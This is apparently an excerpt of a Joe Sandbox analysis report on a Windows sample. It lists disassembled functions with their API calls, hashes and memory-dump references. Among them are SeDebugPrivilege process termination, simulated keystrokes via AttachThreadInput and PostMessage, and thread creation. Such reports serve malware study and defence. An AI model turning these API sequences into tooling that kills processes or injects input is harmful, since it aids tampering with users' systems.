                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: 4a26496b691f573f2fdbedc962ee01ea8bdffeda7816491a0a1cfe45d5378078
                    • Instruction ID: 88ee95d86b5b1be11960bc83932bf34c34252da746002f1905f35e85d6c12f93
                    • Opcode Fuzzy Hash: 4a26496b691f573f2fdbedc962ee01ea8bdffeda7816491a0a1cfe45d5378078
                    • Instruction Fuzzy Hash: DD5164B24087859BC724DBA0CC859DFB3ECAF84340F10492FF299D3151EF74A2889766
                    Function 00CF88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CF896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 36025c17344ec4d1aa8dc33173e7932bb3ce8842695e4002be4a7d75b9eea47b
                    • Instruction ID: a0a2c2a98e5dcef836b3dafae71982b04fa270a98296bdffb5bb3c7458209aa8
                    • Opcode Fuzzy Hash: 36025c17344ec4d1aa8dc33173e7932bb3ce8842695e4002be4a7d75b9eea47b
                    • Instruction Fuzzy Hash: FD518030A0020CBADF649F258C85B797B65EF05360F604116F625E62E1DF71AA98EB53
                    Function 00C72B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00CAC547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CAC569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CAC581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00CAC59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CAC5C0
                    • DestroyCursor.USER32(00000000), ref: 00CAC5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CAC5EC
                    • DestroyCursor.USER32(?), ref: 00CAC5FB
                      • Part of subcall function 00CFA71E: DeleteObject.GDI32(00000000), ref: 00CFA757
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2975913752-0
                    • Opcode ID: e7a8a98726c0faecf03f35185472080bcbcdb2bb5d037b17cb5563ad058b2006
                    • Instruction ID: 674c80976a56133197dca771705ec438a85b8615c90f9c93304efa489256900a
                    • Opcode Fuzzy Hash: e7a8a98726c0faecf03f35185472080bcbcdb2bb5d037b17cb5563ad058b2006
                    • Instruction Fuzzy Hash: FE516C70A00209AFDB24DF25CC85FAA77B5EF59310F108529F956D7290DB70ED91EB60
                    Function 00CC9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CCAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCAE77
                      • Part of subcall function 00CCAE57: GetCurrentThreadId.KERNEL32 ref: 00CCAE7E
                      • Part of subcall function 00CCAE57: AttachThreadInput.USER32(00000000,?,00CC9B65,?,00000001), ref: 00CCAE85
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CC9B70
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CC9B8D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00CC9B90
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CC9B99
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CC9BB7
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CC9BBA
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CC9BC3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CC9BDA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CC9BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    • Opcode ID: 8467d5d88ab6e0ce230b3ce6f10db29c5a22603afdf5acfc0f536255b649db10
                    • Instruction ID: 95440dc918619a5a214dd1d7bd6f0bb5051789e43acba615bf4db9b6b84f8290
                    • Opcode Fuzzy Hash: 8467d5d88ab6e0ce230b3ce6f10db29c5a22603afdf5acfc0f536255b649db10
                    • Instruction Fuzzy Hash: FE11CE72550218BEF7206B61DC8DF6E7A2DEF4C755F10042DF244AB1A0C9F25C51DAA5
                    Function 00CC8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E0C
                    • RtlAllocateHeap.NTDLL(00000000,?,00CC8A84), ref: 00CC8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CC8A84,00000B00,?,?), ref: 00CC8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E30
                    • DuplicateHandle.KERNEL32(00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00CC8A84,00000B00,?,?), ref: 00CC8E43
                    • GetCurrentProcess.KERNEL32(00CC8A84,00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E4E
                    • CreateThread.KERNEL32(00000000,00000000,00CC8E74,00000000,00000000,00000000), ref: 00CC8E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                    • String ID:
                    • API String ID: 1422014791-0
                    • Opcode ID: 8073c9aa1bf91a6245cbb39859047f1953428b606cd7826fe1994ba8cb7025e8
                    • Instruction ID: b6f7ceee2160d526278a5c91faead1f6b51abf4cfa268af6b950e3c3b6e5b3c3
                    • Opcode Fuzzy Hash: 8073c9aa1bf91a6245cbb39859047f1953428b606cd7826fe1994ba8cb7025e8
                    • Instruction Fuzzy Hash: 8801A8B5240308FFE610ABA5DC89F6F3BACEF89711F008425FA05DB2A1CA709811CA21
                    Function 00CE9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-625585964
                    • Opcode ID: 3d251ae561878268d9182ad31d7a727b8693868dbd18dac16f0e5804de524665
                    • Instruction ID: e2569ae498564a171e6e63a4bf9f48bea1df0343416a048be075f8fc7f19c407
                    • Opcode Fuzzy Hash: 3d251ae561878268d9182ad31d7a727b8693868dbd18dac16f0e5804de524665
                    • Instruction Fuzzy Hash: 8891C271A00259AFDF24DFA6CC48FAEBBB8EF45314F10815AF515AB290D7709A45CFA0
                    Function 00CF6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CF7093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CF70A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CF70C1
                    • _wcscat.LIBCMT ref: 00CF711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CF7133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CF7161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: e9fb0adc607193807f521babdb8dc4305d2919490845df768d9a628f028f7a04
                    • Instruction ID: f27de2ae29b781826a65fd3bf523aa24111d770798f84009f30f4ed896c8bca0
                    • Opcode Fuzzy Hash: e9fb0adc607193807f521babdb8dc4305d2919490845df768d9a628f028f7a04
                    • Instruction Fuzzy Hash: A1419F7090430CABDB219FA4CC85BFE77B8EF08350F10452AF698E7291D6719E85CB61
                    Function 00CEEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CD3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00CD3EB6
                      • Part of subcall function 00CD3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00CD3EC4
                      • Part of subcall function 00CD3E91: CloseHandle.KERNEL32(00000000), ref: 00CD3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CEECB8
                    • GetLastError.KERNEL32 ref: 00CEECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CEECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CEED77
                    • GetLastError.KERNEL32(00000000), ref: 00CEED82
                    • CloseHandle.KERNEL32(00000000), ref: 00CEEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 144d00a50d914d9d9b5956163a016e0396074aea91b991bb80009d20d20817e7
                    • Instruction ID: e146988af6ef1ebb220df35535f9cd7c64f88d4966a550d96dd6500c82c7180c
                    • Opcode Fuzzy Hash: 144d00a50d914d9d9b5956163a016e0396074aea91b991bb80009d20d20817e7
                    • Instruction Fuzzy Hash: 4241AA312002019FDB11EF25CC95F6EB7A1EF80754F08802DF9469B3D2DBB4AA05EB96
                    Function 00CD3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00CD32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: d292bd2017451f8ed916bbfabe5f897f3385ce45a94257201d17f579ce8d1eb3
                    • Instruction ID: 03351ce74eff574caa6303824bb5bb53310afb810ada3f931c9c4a63b275a237
                    • Opcode Fuzzy Hash: d292bd2017451f8ed916bbfabe5f897f3385ce45a94257201d17f579ce8d1eb3
                    • Instruction Fuzzy Hash: 0211D531A483D6BFAB016A55EC82D6EB79CDF19374F20002BF610AA3C3E7659B4055B6
                    Function 00CE8BC0 Relevance: 12.3, APIs: 8, Instructions: 324COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00CE8BEC
                    • CoInitialize.OLE32(00000000), ref: 00CE8C19
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00CE8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CE8E50
                    • CoGetObject.OLE32(?,00000000,00D02C0C,?), ref: 00CE8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 00CE8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CE8F3A
                    • VariantClear.OLEAUT32(?), ref: 00CE8F4A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                    • String ID:
                    • API String ID: 2437601815-0
                    • Opcode ID: 5535535e0f5d85879ccc91058ca7e73a1bb225a240c0141efadb7e1c0411f1cb
                    • Instruction ID: 587caecf565048f453ea258ae5cc79bbd6a2c0c9a25625bf3c6d3f7ed66370f1
                    • Opcode Fuzzy Hash: 5535535e0f5d85879ccc91058ca7e73a1bb225a240c0141efadb7e1c0411f1cb
                    • Instruction Fuzzy Hash: 42C13571208345AFD700DF65C884A2BB7E9FF89748F00496DF58A9B251DB71EE0ACB52
                    Function 00CD4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CD454E
                    • LoadStringW.USER32(00000000), ref: 00CD4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CD456B
                    • LoadStringW.USER32(00000000), ref: 00CD4572
                    • _wprintf.LIBCMT ref: 00CD4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00CD4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: aef4e75d96d52c9a5196599d074c42cc8191afe7970f680104f11e82f66ef1ee
                    • Instruction ID: 227e0f7010cd19a22be56c2a73c0debc442dbcc54a7192be88bee149106da47d
                    • Opcode Fuzzy Hash: aef4e75d96d52c9a5196599d074c42cc8191afe7970f680104f11e82f66ef1ee
                    • Instruction Fuzzy Hash: 0C0162F2900208BFE750A7A0DD89FFF776CDB08301F0005AABB45D2151EA749E868B76
                    Function 00C72A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00CAC417,00000004,00000000,00000000,00000000), ref: 00C72ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00CAC417,00000004,00000000,00000000,00000000,000000FF), ref: 00C72B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00CAC417,00000004,00000000,00000000,00000000), ref: 00CAC46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00CAC417,00000004,00000000,00000000,00000000), ref: 00CAC4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 10d46f0d023028d5d825fa01fc540a3af15d0491cbe2308449da07475643321d
                    • Instruction ID: 3b602f47481e76627713ca807345de5d746c71ec6c3bc61e3419c7b0fa1740e3
                    • Opcode Fuzzy Hash: 10d46f0d023028d5d825fa01fc540a3af15d0491cbe2308449da07475643321d
                    • Instruction Fuzzy Hash: EF414830608781ABC7358B29CCD9B7A7B96EF4A324F28C81DF06F86560C6759982F711
                    Function 00CD7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CD737F
                      • Part of subcall function 00C90FF6: std::exception::exception.LIBCMT ref: 00C9102C
                      • Part of subcall function 00C90FF6: __CxxThrowException@8.LIBCMT ref: 00C91041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CD73B6
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00CD73D2
                    • _memmove.LIBCMT ref: 00CD7420
                    • _memmove.LIBCMT ref: 00CD743D
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00CD744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CD7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CD7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: a29ecd2b89c80878062bd8d99de2c2a4656be6c14031516a21cac32b890cd570
                    • Instruction ID: b3b96d9eee9475c35979a207d687bf3b94340484be072732de6a384b6719b1b8
                    • Opcode Fuzzy Hash: a29ecd2b89c80878062bd8d99de2c2a4656be6c14031516a21cac32b890cd570
                    • Instruction Fuzzy Hash: D3318131904205EBCF10DF54DC89AAE7B78EF44710B1441BAFE04AB256DB319A11DBA1
                    Function 00CF6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00CF645A
                    • GetDC.USER32(00000000), ref: 00CF6462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 00CF6479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CF64B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CF64C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CF9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00CF6500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CF6520
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 6c09c017949071a48f530218aff6233c4ffb8e572b04e2d61aff70dc46924ee1
                    • Instruction ID: 7f4881109cde45fda46cdbaaf09a9e3174c7a552497924f1c5d612a09c78e3a8
                    • Opcode Fuzzy Hash: 6c09c017949071a48f530218aff6233c4ffb8e572b04e2d61aff70dc46924ee1
                    • Instruction Fuzzy Hash: 14316F72101214BFEB118F50CC89FFA3FA9EF09761F044069FE08EA195D6759D42CB65
                    Function 00CCC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
